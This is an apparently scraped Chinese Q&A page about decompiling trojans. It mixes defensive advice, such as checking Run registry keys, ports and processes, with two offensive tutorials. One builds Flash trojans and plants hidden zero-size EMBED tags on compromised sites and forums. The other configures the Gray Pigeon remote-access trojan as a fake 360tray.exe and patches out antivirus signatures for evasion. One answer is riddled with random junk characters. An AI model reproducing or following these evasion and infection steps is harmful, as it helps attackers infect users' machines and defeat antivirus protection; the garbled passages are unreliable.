木马如何反编译

① 可以反编译木马apk吗

您好
如果木马APK源代码没有加密

是可以通过反编译软件进行反编译的

如果您反编译的目的是为了修改木马继续传播，请不要传播病毒、盗号木马程序，恶意传播病毒和木马会污染互联网环境，请您加入到维护网络安全的大军中！

QQ木马程序会导致您和他人的帐号和密码泄露，从而可能使您和他人的QQ财产，如游戏、QB等受到严重威胁，严重的还会违反法律。
请您不要轻易安装陌生人传送给您的未知文件，有可能是病毒或者木马。
建议您安装腾讯电脑管家对您的电脑进行实时防护，保护您的电脑安全运行，避免给您的财产和个人隐私带来威胁。
腾讯电脑管家企业平台：http://..com/c/guanjia/

② 能否对病毒木马进行反编译

能

③ 如何破解木马程序

您好，对于我们一般使用电脑的普通用户而言，破解木马程序其实是很难的，因为其中有很多个代码，交错复杂一环扣一环，需要具有反编译能力的人才有可能破解的。

不过您可以使用电脑管家来讲木马程序彻底杀除，从根本上阻止其破坏电脑。

电脑管家拥有基于CPU虚拟执行技术，可以彻底根除电脑中的木马病毒。

希望帮助到您，电脑管家竭诚为您服务，您的支持是我们的动力，望采纳。

管家下载地址腾讯电脑管家官网

腾讯电脑管家企业平台：http://..com/c/guanjia/

④ 木马的编程是什么

一、制作Flash动画木马的准备 _1@2{3|$^'M!A程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛 Flash动画木马的原理，是在网页中显示或本地直接播放Flash动画木马时，让Flash自动打开一个网址，而该网址就是我们预先制作好的一个木马网页。也就是说，在制作网页木马前，我们首先需要制作好一个网页木马，并将它放置到某个网站上去。 %H8H7W*B%N,|:^4i+p6U 另外，我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”，以及Flash动画反编译工具“闪客精灵”，编辑工具Macromedia Flash MX。 二、最原始的Flash木马 (X8h4s8G8L"G程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛 现在虽然有了许多各种各样的Flash动画木马制作工具，但是为了了解Flash动画木马的最基本原理，有必要从头开始用最原始的方法制作一个Flash木马。 'h'C(U$R'I1L2v"ttech.techweb.com.cn 步骤一：反编译SWF动画-O7c$^,d"h&Q7v5W 首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”，反编译成可编辑的.fla格式。运行“闪客精灵”，点击菜单“文件”→“快速打开”命令，指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令，将动画导出为“MM热舞.fla”文件。 5?-^9_-h)b8F3I,E;m5F 步骤二：插入网页木马代码9t!m*W,{5q%\6j"H!]6n"f 然后运行Flash动画编辑器Macromedia Flash MX，点击菜单“文件”→“打开”，调入刚才保存的fla文件。展开界面下方的“动作/帧”栏，再展开“动作”→“浏览器/网络”项，点击其中的“getURL”命令，在右边窗口中的“URL”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用GET方式发送”，在下方的代码窗口中将出现“getURL("http://网页木马地址", "_blank", "GET");”。tech.techweb.com.cn ^#o ~4V%{:m5z4E/H b;W 补充： 步骤三：生成Flash木马 -V"L$o(t8H6m9l)rtech.techweb.com.cn 设置完毕后保存文件，并点击菜单“文件”→“发布”命令，将动画重新导出为SWF格式。用IE浏览器打开刚才生成的Flash动画木马，可以看到随着Flash动画打开播放时，自动弹出一个浏览器窗口，里面将会显示我们的木马网页。 接着~~~~~ 三、简简单单生成Flash木马tech.techweb.com.cn*S0m7p#o5A p7S#C6l2z&f9e 程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛-q"R1h8o8j0Z5c 上面插入木马的过程比较麻烦，下面我们介绍一个简单的方法，也正是这些简单的工具使得Flash木马在网上随处可见。 6V5n8`!I0R/c6~,e程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛+z%m3L'k&}6M2` 运行SWF木马插入器，点击界面中的“选择”按钮，浏览指定要插入木马的SWF文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的“只解压”项。设置完毕后，点击“给我插”按钮，程序提示开始插入木马网页。显示成功信息后，关闭程序，用IE打开生成的动画，可以看到自动跳转到木马网页去了。 2v)l8e"^5H9^&[#_!l 9{7l#Z+X"J(P @,B 四、Flash木马的利用 9U+p6W;d;D7e+F9Ktech.techweb.com.cn 4W6Z4W1v4V"}4A/D$t._0_7P1o 看到上面的步骤了吧，生成一个Flash动画木马是不是很简单? 那么生成的Flash木马该如何应用呢?只要我们将Flash上传到某个网站中，就可以通过论坛或网站之类的直接利用了。 补充： #B&c)e#c9A%`-w程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛+|,K({&L#P2n:\6^ 大部分的论坛中都可以发来Flash动画的帖子，利用论坛发帖，攻击者可以快速获得大量的肉鸡。以PHPWind v4.3.2 论坛为例，在发帖或回复时，点击编辑窗口上方的“插入Flash动画”按钮，设置Flash窗口大小，使用默认设置后，要求输入Flash的URL地址。确定后，可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””，这就是完整的Flash播放代码了，不同的论坛代码是不一样的。TechWeb-技术社区5h4n8X5]/@'G+`'R'i %`6W'e)~"h 应用二：网页嵌入Flash木马"U3S9Z3v ^ 1q8X!h-V+V0T 攻击者入侵了某个大的网站之后，很可能在网站首页挂马，使用普通方式挂马会被管理员发觉，但是挂上Flash木马的话，是很难查杀的。攻击者可能在网页中插入如下代码：8y1o*@6L&l5k8L i8a9u%A,h5@/w “《EMBED src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”，其中的《》改为<>。 $B;{)o,j5C,A.H;Z(sTechWeb-技术社区5L/b)o'K,m:s'i1t 这里的参数“width=0 height=0”表示，Flash播放窗口为零，也就是不显示Flash播放窗口。其它用户浏览网页时，就会莫名其妙的弹出一个木马网页窗口。 '^9e#G)n:X-j*T 1f6F#k.z&j3G

满意请采纳

⑤ 如何反编译木马程序

木马程序是一种程序，它能提供一些有用的，或是仅仅令人感兴趣的功能。但是它还有用户所不知道的其他功能，例如在你不了解的情况下拷贝文件或窃取你的密码。

RFC1244(Request for Comments:1244)中是这样描述木马的：“木马程序是一种程序，它能提供一些有用的，或是仅仅令人感兴趣的功能。但是它还有用户所不知道的其他功能，例如在你不了解的情况下拷贝文件或窃取你的密码。”随着互联网的迅速发展，木马的攻击、危害性越来越大。木马实质上是一个程序，必须运行后才能工作，所以会在进程表、注册表中留下蛛丝马迹，我们可以通过“查、堵、杀”将它“缉拿归案”。

查

1.检查系统进程

大部分木马运行后会显示在进程管理器中，所以对系统进程列表进行分析和过滤，可以发现可疑程序。特别是利用与正常进程的CPU资源占用率和句柄数的比较，发现异常现象。

2.检查注册表、ini文件和服务

木马为了能够在开机后自动运行，往往在注册表如下选项中添加注册表项：

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnce

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnceEx

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServices

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServicesOnce

木马亦可在Win.ini和System.ini的“run=”、“load=”、“shell=”后面加载，如果在这些选项后面加载程序是你不认识的，就有可能是木马。木马最惯用的伎俩就是把“Explorer”变成自己的程序名，只需稍稍改“Explorer”的字母“l”改为数字“1”，或者把其中的“o”改为数字“0”，这些改变如果不仔细观察是很难被发现。

在Windwos NT/2000中，木马会将自己作为服务添加到系统中，甚至随机替换系统没有启动的服务程序来实现自动加载，检测时要对操作系统的常规服务有所了解。

3.检查开放端口

远程控制型木马以及输出Shell型的木马，大都会在系统中监听某个端口，接收从控制端发来的命令，并执行。通过检查系统上开启的一些“奇怪”的端口，从而发现木马的踪迹。在命令行中输入Netstat na，可以清楚地看到系统打开的端口和连接。也可从www.foundstone.com下载Fport软件，运行该软件后，可以知道打开端口的进程名，进程号和程序的路径，这样为查找“木马”提供了方便之门。

4.监视网络通讯

对于一些利用ICMP数据通讯的木马，被控端没有打开任何监听端口，无需反向连接，不会建立连接，采用第三种方法检查开放端口的方法就行不通。可以关闭所有网络行为的进程，然后打开Sniffer软件进行监听，如此时仍有大量的数据，则基本可以确定后台正运行着木马。

堵

1.堵住控制通路

如果你的网络连接处于禁用状态后或取消拨号连接，反复启动、打开窗口等不正常现象消失，那么可以判断你的电脑中了木马。通过禁用网络连接或拔掉网线，就可以完全避免远端计算机通过网络对你的控制。当然，亦可以通过防火墙关闭或过滤UDP、TCP、ICMP端口。

2.杀掉可疑进程

如通过Pslist查看可疑进程，用Pskill杀掉可疑进程后，如果计算机正常，说明这个可疑进程通过网络被远端控制，从而使计算机不正常。

杀

1.手工删除

对于一些可疑文件，不能立即删除，有可能由于误删系统文件而使计算机不能正常工作。首先备份可疑文件和注册表，接着用Ultraedit32编辑器查看文件首部信息，通过可疑文件里面的明文字符对木马有一个大致了解。当然高手们还可以通过W32Dasm等专用反编译软件对可疑文件进行静态分析，查看文件的导入函数列表和数据段部分，初步了解程序的主要功能。最后，删除木马文件及注册表中的键值。

2.软件杀毒

由于木马编写技术的不断进步，很多木马有了自我保护机制。普通用户最好通过专业的杀毒软件如瑞星、金山毒霸等软件进行杀毒，对于杀毒软件，一定要及时更新，并通过病毒公告及时了解新木马的预防和查杀绝技，或者通过下载专用的杀毒软件进行杀毒(如近期的冲击波病毒各大公司都开发了查杀工具)。

⑥ 木马怎么反编译

不懂汇编是不行的，你这样说证明你不懂，不要紧，现在就开始学，还不算晚

⑦ 请教如何反编译手机木马

反编译安装后的exe文件,网上有很多反编译的软件,反汇编后估计要读懂也比较困难

⑧ 今天电脑中病毒了，提供病毒文件谁能反编译一下

这表现和autorun病毒一个样哈，起码类似，形式。

⑨ 如何给木马做免杀

给木马穿上隐身衣
精心配置木马灰鸽子黑方专版，做示范讲解
打开---配置服务程序----自动上线设置（自定义按需要）-----安装设置（要把安装路径修改为$（windir）\360tray.exe,）并把文件安装后自动删除安装文件的勾去掉---启动项设置（显示名称为360tray.exe）----最后描述信息为“360安全卫士适时保护模块。配置完成后，发布生成木马，并双击测试能否正常上线，确认可以后便开始对他进行符合定位特征码进行免杀设置，这里将生成的木马存粗放在桌面上，并命名为MM.EXE
二，定位特征码，定位之前我们先要吧MM进行压缩编辑，蛰样及去掉部分垃圾代码，让木马正常运行，重要的是后期查找特征码能节约一半的时间。
打开simplepack软件 见MM.EXE 拖入软件界面，在选项中勾选“创建备份文件“并选择方式1”压缩资源“最后单击压缩，压缩后的mm一样可以上线，
2经接着对压缩后的mm进行特征码的定位，打开myccl“符合码定位器”软件，单击文件按钮将mm.exe导入，将下面输入目录设置为”c:\users\adinistrator\desktop\OUTPUT,把分块个数改为100 接着单击 特征区间按钮 最后单击生成按钮 此时窗口提示 请对生成目录惊醒杀毒 杀毒完成后请点击 《二次处理》按钮 确定后开始对对桌面上的output文件夹进行杀毒 ，
查到病毒后，点击“清除病毒”并将下面的“用相同方式处理此类问题”勾上，这时会杀掉100 多个病毒文件，完成杀毒后回到myccl窗口这里继续单击 二次处理 按钮 软件提示“程序找到一个特征码，是否继续生成文件特征码，但可能还会生成其他特征码，是否继续进行生成文件分析，？ 这里单击yes 按钮 此时继续对桌面上的”output” 文件进行杀毒 重复处理 知道查不出病毒为止，
查完后myccl;右侧的特征码区间设定，回查找特征码如：00000e0---00001db 有机特征码并选择“符合定位此处特征，接着将分块个数填上 100继续生成，output 文件夹进行杀毒定位其他特征码， 几次定位后 最后定到单位长度为2 最终得到一个特征码，，将它记下，假设我们这里得到的最重复合特征码是：00545cc—0000005这里我们只要记下前面的00545cc即可，他就是瑞星判断mm的特征码 正是我们想要的，、
修改特征码。
得到瑞星对mm的特征码，紧接着我们要对利用c32asm软件对mm进行编译，吧00545cc编码重新编写 使程序跳过oo545cc 这样不支持就不会被瑞星发现了，最后生成mm.exe就是最终的超级免杀木马，let go
启动c32asm将mm打开进行反编译，此时右键鼠标—选择（对应HEX编辑）在编辑模式下找到00545cc这项，但最终我们只找到这项和00545c0和答案接近，不要急其实他就是我们要找的特征码所在，在他后边找到e5然后右击鼠标“对应汇编模式编辑”
此时在汇编模式下找“00545cc”代码 并将下面一项一并复制下来，内容如下00545cc:83c8 ff or eax ffffffff
004545cf ff6424 20 jmp near [esp+20]
接着在该模式下去寻找 一段空的位置 （也就是汇编为00的位置）例如004000212 右键鼠标选择（汇编“并在窗口输入jmp 00400039.这丫给我们创建了一个跳转的空区域 这是程序不运行的，下来我们就要在这里做文章了，
选中00545cc的汇编代码or eax ffffffff 复制 接着来到刚才的的空区域里随便个位置右击汇编项 在弹出窗口中将粘贴进去 单击汇编 结束 紧接着在该剧的下边一句输入汇编命令 jmp 004545cf 单击汇编 结束 后便继续找回 00545cc选择汇编输入 NOP命令 把该句的 NOP去掉 接着在该句右击鼠标选择汇编输入jmp 00400021命令。最后单击文件，另存为给该木马从型包装的成mm.exe命令
双击mm.exe发现灰鸽子可以正常上现了，在查杀 没有找到病毒， 至此这个超级muma

⑩ 一个电影文件和一个木马编译成后缀为exe的文件，怎么把木马去掉，或反编译出电影名谢谢

这种木马的毒害性很强，往往你把木马杀掉，电影也就不能观看了，
有一个办法值得一试
卡巴斯基有个“清除”功能，不同于一般杀毒软件的删除，可以把这种渗入型的木马杀除，很少出现破坏原程序的，我有个小游戏就这样解决的